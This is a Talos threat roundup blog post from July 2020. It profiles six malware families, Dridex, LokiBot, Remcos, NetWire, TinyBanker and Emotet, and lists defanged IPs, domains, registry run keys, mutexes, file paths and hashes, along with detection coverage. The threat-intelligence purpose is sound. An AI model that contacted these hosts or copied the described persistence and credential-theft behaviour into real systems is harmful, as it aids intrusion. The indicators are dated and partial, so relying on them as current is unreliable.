Friday, July 17, 2020

Threat Roundup for July 10 to July 17


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 10 and July 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:
Threat Name Type Description
Win.Packed.Dridex-8827837-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.LokiBot-8698229-0 Trojan Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from many popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Trojan.Remcos-8699084-0 Trojan Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.NetWire-8705629-0 Packed NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Keylogger.TinyBanker-8791735-1 Keylogger TinyBanker, also known as Zusy or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Trojan.Emotet-8831420-0 Trojan Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.

Threat Breakdown

Win.Packed.Dridex-8827837-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
25
<HKCR>\LOCAL SETTINGS\MUICACHE\66\52C64B7E
Value Name: LanguageList
25
Mutexes Occurrences
\Sessions\1\BaseNamedObjects\X8mdYHOY8b 1
\Sessions\1\BaseNamedObjects\Ut8mrtIyK8 1
\Sessions\1\BaseNamedObjects\xV8DaYJqBh 1
\Sessions\1\BaseNamedObjects\zM4pAveIzF 1
\Sessions\1\BaseNamedObjects\dvthfjjeSq 1
\Sessions\1\BaseNamedObjects\TxV53LW0fw 1
\Sessions\1\BaseNamedObjects\kjYzS3FBf0 1
\Sessions\1\BaseNamedObjects\Gd2lM282If 1
\Sessions\1\BaseNamedObjects\8cJJF971pF 1
\Sessions\1\BaseNamedObjects\0ZLQGKPrsk 1
\Sessions\1\BaseNamedObjects\exgJlYXto0 1
\Sessions\1\BaseNamedObjects\3drb6W0qjO 1
\Sessions\1\BaseNamedObjects\cufo5v6r1B 1
\Sessions\1\BaseNamedObjects\I6OelmgKcp 1
\Sessions\1\BaseNamedObjects\OQn0ntm6vj 1
\Sessions\1\BaseNamedObjects\EDaX68iPDI 1
\Sessions\1\BaseNamedObjects\GCUbcoRHVR 1
\Sessions\1\BaseNamedObjects\TOo3cHsdFZ 1
\Sessions\1\BaseNamedObjects\AoIzaTR9Zb 1
\Sessions\1\BaseNamedObjects\Nulp0B5VU1 1
\Sessions\1\BaseNamedObjects\GUrvcftYUJ 1
\Sessions\1\BaseNamedObjects\UPzFb8J7iX 1
\Sessions\1\BaseNamedObjects\zlhFVM2krx 1
\Sessions\1\BaseNamedObjects\GheSQMXCsH 1
\Sessions\1\BaseNamedObjects\JbhjpD4jlS 1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]23[.]99[.]190 13
104[.]23[.]98[.]190 12
172[.]217[.]197[.]100/31 9
205[.]185[.]216[.]10 7
72[.]21[.]81[.]240 5
205[.]185[.]216[.]42 4
172[.]217[.]197[.]138/31 4
172[.]217[.]197[.]113 2
204[.]79[.]197[.]200 1
172[.]217[.]197[.]102 1
172[.]217[.]13[.]78 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
pastebin[.]com 25
ctldl[.]windowsupdate[.]com 16
cds[.]d2s7q6s2[.]hwcdn[.]net 11
cs11[.]wpc[.]v0cdn[.]net 5
www[.]bhvcnilnxq[.]com 1
www[.]ca7ax5kdsp[.]com 1
www[.]yz0oyqdi0g[.]com 1
www[.]gofuuc5wmb[.]com 1
www[.]kyt7yhrfyc[.]com 1
www[.]z9htvoigia[.]com 1
www[.]uc3nhnajyx[.]com 1
www[.]di7cln2izr[.]com 1
www[.]ynqawy0n05[.]com 1
www[.]c6zyoxlpfh[.]com 1
www[.]4vyhny93ku[.]com 1
www[.]b5m6f5a21q[.]com 1
www[.]mvv8gvuiy1[.]com 1
www[.]owvvajedxy[.]com 1
www[.]uoetm1pdeg[.]com 1
www[.]cvglpli1qz[.]com 1
www[.]ebiufgdzos[.]com 1
www[.]wm3qfbhlv0[.]com 1
www[.]rcjldxckwn[.]com 1
www[.]mrwqnhk8zc[.]com 1
www[.]7ayyovgtmw[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 16
<malware cwd>\old_<malware exe name> (copy) 16
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 2

File Hashes

0a458f25b16b546f0931f7cecffb1181caed311660c175c8c8d34c871007a62b 0b4b945ae60f52616f2cc1d873af5d2a02cb83d787d3d131c6171ac4c62e1124 2517cb61f9a99c4010ec511568169515734ebd10deb189384fcec666728c050e 2971cdf6b7fb81a37052acdc0d4de87ae2fd462f39a8f4c1c7043f9f4e28ef29 2e9721add69ef3e6eb8dcb0a6502a1d8e59330393244263b109eac301b6cb88a 3590c5ed9b5c8a95713240b3b6a8b3110f605523da2e548d1c5ab043ab1d44b8 3e567c7102100cd377db7108f81979a439a903821da1cfd7bbd9be012a1de783 430e8d5555257b9794340d38819f1284231a5c3582a0041db420d950be7876ed 432f369c0c95be349a3ba5b394f612fdfbd2fa1ac9e14c0528e7c38e8fd1150a 610cff87cd900ca26f09a7ffa2ca70356c0d902ace7a9e05a01628ed083d01d5 61eebfa1538d1720a32b9a3a30f70313b480465a05d7f930563ac3d6b5514f1b 77aec805bed94f2693ce7802df374e1d5ce2f56d46174ab9cfe167bc0faf3a74 7886a0740a021f1393dc4f154fcac8fccc118c9e25c16b266012c8538cd94359 7cb1043cef6fe87bd14803e9676190124878d2d040f996ebe58cc6d8f299ba97 860f6587300d97e47de60f87a6974f9da7dfeb5e813b9780bfb621cbc9a0e530 9f1b795d0723f78350ba11e390114dbd6cba2e59f25a4c5d3e684c7b0d508a3b a446e1d11f89bc5610d9ca9b6bcd1faa91f3635c44a548c5ad80c88a401a1442 ac78ec2ebd63237012252d7355416cd3847ac0d03f3942057e2ba0d17d641ca7 af427e783d5fd2c3b292b29f2aa6e2cda13d23dd92a67a7d963a248afd555d00 b0065ebb81e62013d8a02113003775edb061807589a908d199d0c091581c9487 b3092894e72004368dfe1dde9c9f213cabd25fe683b70eb7e24ff0093094a343 b8d40c04b216547bc7d84f094f9cd7ad15b193a24b7f0e2f861caf1716079420 babde11121df3f032d3b6c3b6ade8a9363b25f9bc8dd88ca4b31af80620fc185 bae259e9bc04f7efada21102f63fc8df0db0761f74fd5069a04ac30357c61fa6 bf890d27babe1698002618e8027b5c682a828ce8e3e7093f140eb32ce480449a
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Trojan.LokiBot-8698229-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 48 samples
Mutexes Occurrences
3749282D282E1E80C56CAE5A 44
3BA87BBD1CC40F3583D46680 27
Global\399bab01-b9c0-11ea-a007-00501e3ae7b5 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
50[.]31[.]174[.]86 44
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
wardia[.]com[.]pe 44
Files and or directories created Occurrences
%APPDATA%\D282E1 44
%APPDATA%\D282E1\1E80C5.lck 44
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 44
%APPDATA%\D1CC40\0F3583.hdb 27
%APPDATA%\D1CC40\0F3583.lck 27
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1258710499-2222286471-4214075941-500\a18ca4003deb042bbee7a40f15e1970b_8f793a96-da80-4751-83f9-b23d8b735fb1 27

File Hashes

02405e5b4e6e088d62745e8dfd4b5b4b9491b3db7fb1015e58b97540faf83a12 05b528653d1e8ccb41ad0c548c241eecac3975dff75b52265fee43e1a3c73702 06166ad95fb7e93e9188bfce187973d9119de33b9f4dbd14d6ccb1d944bbd3ce 08595b0bb686e62691ba5ea7493d7910dce9d49b91083f4ca56c032056ab1fb0 0986f1341bdb2a5addd83cdc9e166538e01c5b0452a5906e86d5885ee138939e 17ea37b291a0e7c18627f1b1776225fae81bf0d9ef903c66573b9133f8322d92 1bc766900cfba5f94c6f1733615d96a8834b5ca34d79f45e120342185445c8cb 29a018b12ea30cf94dcab8b5c051440edc99dd53fec1e77c4defcc6a6be2818e 2a9af6d9215c0783552a3eabaca2b0d982539d4c02fe28a2f5f7be3e7f8a9166 30600ee5509e5ba51684ae971b4bf271387ba080f229c92af85c585470748672 3545641198203804c69e11c51863818789c56ae73035e133df5564c3b54efb0e 38121326a2c7ee77a3f07f527401011918ab496c3bb7b54b1fbeb13d55b78d3e 3d742d794b637d0a9117dd81f2f42f8376387faefe84566b5eaf6200bba999e4 4bc88ed49a1a6e9687bd7e6029aa342df798a9df7aaae8fd55216412123bf6ce 5008af9d951ddc879c098dffbfc9af85b6f96ce32272485f0346fefa3b493768 556ccb1f58e3fcb0e21a33126d4b0c9db301a67ef73707bfe01e6e8617b98c31 583683deb9f5b36e4727455fc30e6ad6c67691f96c2cfd205a3ddb690e579a4d 5b80f62dbee57c236b952eabd918eed83182870d4a413fe135f578ea905446b5 5d717bd1c7a0382de9e17aa60ac47338ee9ff3386f0cd71a98d1e362edb978c2 5d7b52a064d68237714bcf5c1a30c9534f4bc64c8b60305e69086ea2f552cc2e 60e10c08bd4b22471b3fd3f57b573cf9733ffd6743e6a1c3f80f2f55e1fb78af 64161b5861ba3e25658555cebdf0839450498838d61bed11857397be364b3eb5 66184f03bcb915746e01c9db03c9338b817ed48ef3b952afa25e10e9524f7d06 6cb0d058dbfa61e106ac946c6e2458f4c77572551f1c1167fda8ec7163097714 74cc691f958baafe2a83f013d35cc109fc5ef6b1548e2237134ad8e2ca5fb437
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Trojan.Remcos-8699084-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 31 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: remoteaccess
31
<HKCU>\SOFTWARE\REMOTEACCESS-K0BEK4 31
<HKCU>\SOFTWARE\REMOTEACCESS-K0BEK4
Value Name: exepath
31
<HKCU>\SOFTWARE\REMOTEACCESS-K0BEK4
Value Name: licence
31
Mutexes Occurrences
Remcos_Mutex_Inj 31
remoteaccess-K0BEK4 31
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
79[.]134[.]225[.]111 31
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
magiobi[.]myq-see[.]com 31
Files and or directories created Occurrences
%TEMP%\install.vbs 31
%APPDATA%\app 31
%APPDATA%\vlc 31
%APPDATA%\app\logs.dat 31
%APPDATA%\vlc\remcos.exe 31

File Hashes

00475692be68c9b147238676446142bf183700deeb8cd32e143353e77ab09a73 0bb8dd1949a99bb002583f1d99dce985bb3e269ff2e233a769cca50fa55a5acc 110d620ca455d7584f798a7799b0a92cf07e3f673cecb0f959125afa3220c394 1950e9f3140894c5fa1bd7d3ebe93a66a36d53fa6d3c1402f3acbdc9bb9dacd4 19581a964e84d02eaddea5b5c7579be4527504e4c56db6f06e627c831bae0e17 1b480b38b483190e7d97c91f40c0fcaa27c0ccd9b30897d026a3b8abccd380bc 1eb8c52f35e953a57e61c06507fb74ec25b33d0265491e064390e6d3410f1b82 1effacfb3cff4e0b46df62b414b87b4ea0b70e9ec4bebfc55ec54bd3dbe5ff89 20800e07fc493ab6d35cc716293a212d6a62a22ef0d56dfbcde5de1b99c1c2c6 20d2a78d773f10bc9d3140bd25fc23e48fce0a2c82ec930698caf5fbf5c05b9e 20ea5776c98d3b978bdb6c1c131ba031840f1cc5f079d9453095ca00c17854b0 20fab6ffe5d240cda3e26437f4bccec2484aa404e66d7f8a255d3e5f6cb014cf 2449ba0a1d2970e93843dfc8b8275895f171dc27de3ab8b2f531c536560a8bd4 25cefc67cc2c8a6b7707a981617d1f64084c7e63736db9dd4e9aae04a2e10efa 25d2c4098787879f8ed49e7578a39ecadd6694d5acb9d02aa44214d2355a88f0 26320027a60323637100fd056f7c4a36da109ee720e7988ba9ef773c500db51f 278300c25364d9b5a1d9b8300eebc8de89c1c263c6d7337fd9617b91f183d02d 2bbfd6807ee7b1aec8c84789403609cf03f6afeed38c8a5f6f8d561eb9131f89 2eb9a53923cb79951c0bbb7cdac72ecae254d75373b59e55280affab1382fb8c 339579a70517724b8f3e4863fbbf5ab5bda9e16861a9b4c4e2b6ce5020c51687 373aac4f9b42c515ac0179869208d0b4e02f3d1fbd45a2a99593b2a5b9264262 398cee4133c816b2b13bbbd5e6c1699a27ebcc1e9077747994dc9908d2b56f0d 3a5c61220e103be08542a1d47f44d79410b0fca2af2a5077376ab7b2bdd430dc 3cbc96f8841fd2fbe9775b639430ff20cdf7bcf9ea3c1dc839867d19bde1585b 3cc44cd55cad45f5596713f80ab45836cf33edf959e59ece400e14445f9a0d09
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Packed.NetWire-8705629-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 28 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\NETWIRE 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: officeii365
25
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
25
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
25
Mutexes Occurrences
- 25
Local\MidiMapper_modLongMessage_RefCnt 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
155[.]94[.]198[.]169 25
Files and or directories created Occurrences
%APPDATA%\Install 25
%APPDATA%\Install\offiice365.exe 25

File Hashes

036f04fc85c6cc8caca32c566f4a2aee4f4ad4cce00c0a4ebd9112f85368ac85 137a08e7d60b02f3945079b128bdfbdb5f6542a1c40da55e98706611145198bf 16378feb7c715fa61226714f677c483cf7f2f6d76f0ecdf9a5a53f19cb222269 1b931bc1f1aca020b9ace62ff9edfaf9d0c016d96f596e1ab452a4a9c8f73c4d 1e36ad4c1ca3bf21c9bf25e99d8c49e7dcdfa8afb00b5b64b531774ac5f37026 1e4a53218f364bb950b259b7dfd14a470deeb8016202b70e22ed2a62fd1f6338 1f7fbe1b534336f82085dfc4fa6de67db5a480be385ef03e2bd4378073645131 227f4b7cb1b4256ee6b283a781ef9b9b7a763c6328d70e9cf8acfe9e5fae109a 24fccf9369918b06aa514ec3d12709ab4fc21375f1b8b3f995588df5bed8fc28 27805e582560adb6ebe4c394affe9f4c8143b5187d9d77d8b9c0e366d9d5c791 2c9fdc8c5056568797437e12eaf849b38a732d066868294fdccb0935a7406e47 2cfe584b0b15fc716b4b09a916bd44b3a2d25bef612ca7cc5665564f6e67e20e 2dd5fd8f00f9837b33fd06bee57ffa2b66f42a268dda9cec066b499198faadd4 2e5b01f3247577c8faee97771425afaddf9642f5724330922fdcb6499168e8d4 34ad531b5988a986ecd4e84a1333789fe927bfe623c1af30b5eeddcd3a0b929a 3a1c83a8cc8be9cf1bc560b306f1efc05ee968ffc1cd5cc09f03cfc396376d9c 3a745a6f37ca1cdd7008b5c055e1ab1f6c08b4cbe8635f7daee04d6fabaa61ae 3ad06c1c1870e53f1bb229d8f12046e7b6ca2d9de4425d1a4c57b689e7a6995d 3e00e706e14da9d53f8339d604ab82a5e2d4366d1e166218dad4068c9822599f 427d644fef555c6c5133fcd3fa1979d5a0f642a6ec09184292515ff2cdf70f17 42d11a1215979e76c83ac4ef151bbc53344c6fbb039d73e1a40eba3c725da2c9 43e8dd8857d9ddaf07d6d13eb054445d2d195aa84009cbcf33ca962659316fc0 47ff48a7c4608bc0c839f627f30d732df2387bb3a48b12b7be06c7c6f6a07535 4b12e1d2a5f2efaf9bf94c3639191757178998bbd6d40a24fdc7939df872d459 4dfc0cca0d7afe312265579018baaa69c774b8942f19454e37b03bf89b001574
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


MITRE ATT&CK




Win.Keylogger.TinyBanker-8791735-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: FAFEB955
26
Mutexes Occurrences
FAFEB955 26
5E60878D 24
Files and or directories created Occurrences
%HOMEPATH%\AppData\LocalLow\FAFEB955 26
%APPDATA%\FAFEB955 26
%APPDATA%\FAFEB955\bin.exe 26
%APPDATA%\5E60878D\bin.exe 24

File Hashes

02f714d9530681ca2b5de1651c8e71a29c0bef9fc570a2d54eeb24d8ffcf02be 0ebaddef17527ae1f59121ac7ae05fcb2806fc36fd4ea5e3a8d63999d1ef8245 141731282c5378b959ee12a97d564b58bacae43a50ffbca289a5df8ba8d0771d 14398c45f2dc4d5c6d4c16ba9f276888eee4eb396863a355d059b55795d606e3 15b502a449d911c76cce06cd378d291e8039619a06ace593abbdd2cebe3add27 1be832d22e4a3c920076ff78eeb08e73d0077b04d29b29c2347c5de170b425d4 200a2c5eaa6ce90cc3f825ec4f4f3d8de444282dbd558a9dd0698a9520db2a58 292daa2b85d6423471ab688bf3dcaa91661f9e930ecdf88d9ae8cefdfe8e76fb 36d265d452dd91cfc0640b59f3184112c0e3e20f1c5f1e6409452881458083b5 3c21cb07d0391719918fa40c59ac02b1d0444813bff01aa57ed0173ea17907fe 4015c1917edbb2e1b9db30a3c02f3ae4e8f9ba7015f3c3c0a4274c281e508f7d 40789d2be55ca929fe9e9ebdf084b84a42ec88d166744d06bbda41e24bb98e39 40c0d24f854db3548f0d9ef8fef3cfc7463fae25e690f426e044042e35f46a48 43b909534495841ca1ca6d5a16b4a8ced3c611ae84114d150731c9606cb1b574 47381ffb76fa60172fe273eba6dbb66ac6ebe05c1e6b6a7af863be2b990482c0 4d060e479439e757e3472f81a15da6ae38c7cbf9155c7de9817bf30552088b22 645dafa65eec41b157e7dd205b07df97148105950dea2d0722f02f53f449e2a0 67b202a511ea9de94c1dfd71134539bced5d3b51c0b4020c5585fb4e49334beb 7b4bc90a5a8ebd89b6dd4b804257ec8c0c3b6bc2565a6c6f1e24f77f4b33fca5 8cf7d553e27a5c642812bb040f97bc92746d64b9909bddbb38916d36fbeb8c0f 9a21d7ef4b6f50a4e4ce47791bf2231a523884cf58e4d94e2089464967fd6e25 9d76af39b9de6fc9f58ca5d7a83798f37790d2193ff88a71cccad19092009a5c b43794417fec9191f8700df446b20875bb753c9380c70e0c7c6869502fa16282 b47214f748eef3fdd27388c1d59b4a308910d442f78cead2dee6895169ae9e76 b853ec7bf8d69a2ea7203a8881c2671c8e2a546e7a9a299e6062275e52f10cb2
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Trojan.Emotet-8831420-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: 98b68e3c
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSIDENT
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBD101A
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBD101A
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\JSCRIPT
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCRRUN 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCRRUN
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCRRUN
Value Name: Start
1
Mutexes Occurrences
Global\I98B68E3C 8
Global\M98B68E3C 8
Global\Nx534F51BC 3
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
64[.]88[.]202[.]250 16
212[.]51[.]142[.]238 15
91[.]236[.]4[.]234 6
219[.]92[.]13[.]25 6
239[.]255[.]255[.]250 3
51[.]159[.]23[.]217 3
190[.]63[.]7[.]166 2
41[.]169[.]20[.]147 2
177[.]0[.]241[.]28 2
82[.]165[.]15[.]188 2
72[.]10[.]33[.]195 2
190[.]111[.]215[.]4 2
46[.]49[.]124[.]53 2
45[.]118[.]136[.]92 1
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 7
%SystemRoot%\SysWOW64\msihnd 1
%SystemRoot%\SysWOW64\WinSATAPI 1
%SystemRoot%\SysWOW64\offfilt 1
%SystemRoot%\SysWOW64\msjetoledb40 1
%SystemRoot%\SysWOW64\KBDHEPT 1
%SystemRoot%\SysWOW64\WABSyncProvider 1
%SystemRoot%\SysWOW64\KBDTH0 1
%SystemRoot%\SysWOW64\OpcServices 1
%SystemRoot%\SysWOW64\SensorsCpl 1
%SystemRoot%\SysWOW64\MshtmlDac 1
%SystemRoot%\SysWOW64\wkscli 1
%SystemRoot%\SysWOW64\api-ms-win-crt-math-l1-1-0 1
%SystemRoot%\SysWOW64\ELSCore 1
%SystemRoot%\SysWOW64\api-ms-win-crt-time-l1-1-0 1
%SystemRoot%\SysWOW64\jscript 1
%SystemRoot%\SysWOW64\shell32 1
%SystemRoot%\SysWOW64\WMADMOE 1

File Hashes

10f75e4e6204c4215d8047e9f83e00773a2284b04ff5aab7fbc236e919fc12e9 1ea8ae69eb42468750338bb04cc79e8bbd2236e99c2fbf7f125de412e8cdb646 23e13139b833a414448ae656c380c264d11e5fb0227b0e12e41cc5adc10fe9e9 2d016bb33f995698e9e525b03512dd3200a072a950b50e94f4f3de9ff90d6445 34f21a49272f624f497acb323a6df3ec6e89088bda108f909adcfa2846665bd5 3a97337036a588e085c1f10e8f792c43e67379edb6de2a62686eacb65ac3fc84 49d04a0ed478b4053657628d9a88e07b02718cca6541a223f13244a65a2c3904 4a9eed59a71750a9a6b8b34b3f1d03adad982177419bea9baa70e13425551462 4f6d64664580bacb5b28d314b2814fbcdd19a9aa1fbe8a10cd7faaa2bb63cdf4 61931b4ebafb6a97880d044bf6d4bb36b393802bb91b520ee67df67dfdaaabe9 70973f1f044e7fb95562fc81e556139bf9a686c18dd25ff2c1fb37a0a828e8fa 8d395656288dbc0f038ebfe537fb603975e5c9a631e5bc9d0d2f26697ff7124d 90aa60078efd0531575251e576f8fa0fb57432f9c77151ed60db5d0af864b71f 9771356e41636b0e3da22ba6601a9e3bc241ea9564f7ebf69c38d2850e68f965 9fa3c2548e95641795c633ad21af14c37bc4eb45ae7c915c7f36b2d1dae632a0 a121870fb766b6bbee682ad7b2980fa6a9f8d5e3196e6b99575ac14f998ab67d a5b7b3d636b5edc5fc8c66f114d9056af27ada565023d1da7ccc8bd003cbc92f b40b7e83e298fa903beb99e73a3dfa815590ef5eda2b2992f9a2c4039bcde339 cc58728510132994e3711b73422259a4d655d3685bd49865d36287c5578ecc8b ce920e9f2fc887bb90b22a11e9bacf4c683a635f8e6cabacc0273403c77de0cd d17cf7c62851a60933d038d70c00b0a3b4ec631f8f87b5e2c0913d22f5ddb494 db1a25b0bfbe7ebe00261719ae07d4e5ceac5d00be2a3100f297093d7ddac5c1 e21ec7fa13f35c42eb42a16242614b37f853f9ad823233c4507eb303dca9257b f20a22823274fe7c6facfe45cf72dcd045843d170dcc184282b02f1d182bb08e

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (13646)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Excessively long PowerShell command detected - (5703)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
CVE-2019-0708 detected - (3105)
